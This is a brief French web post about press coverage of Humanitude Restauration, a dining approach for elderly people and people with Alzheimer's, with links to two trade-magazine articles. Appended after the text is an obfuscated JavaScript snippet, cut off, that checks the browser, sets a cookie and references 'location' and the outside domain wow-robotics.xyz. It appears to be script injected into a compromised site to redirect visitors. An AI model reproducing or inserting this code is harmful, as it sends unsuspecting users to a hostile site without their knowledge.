Humanitude restauration : la presse spécialisée en parle
Le 15/01/2018
Sabine Soubielle, formatrice et directrice de l’Institut Gineste-Marescotti Restauration présente Humanitude Restauration dans la presse professionnelle : Gastronomie Holistique® et diète-éthique - DOC’Accompagnement N°11 Septembre-octobre 2017 > Lire l’article Les spécificités de l'alimentation des personnes atteintes de la maladie d’Alzheimer ou troubles apparentés - DOC’Alzheimer > Lire l'article var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var...